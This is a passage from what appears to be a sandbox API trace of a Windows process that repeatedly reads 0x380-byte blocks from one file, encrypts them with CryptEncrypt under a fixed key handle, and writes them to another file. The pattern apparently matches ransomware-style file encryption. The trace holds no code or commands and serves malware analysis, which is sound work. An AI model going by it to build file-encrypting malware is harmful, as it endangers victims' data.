lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.630] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.631] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.632] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.633] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.634] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.643] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.643] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.643] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.643] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.643] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.644] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, 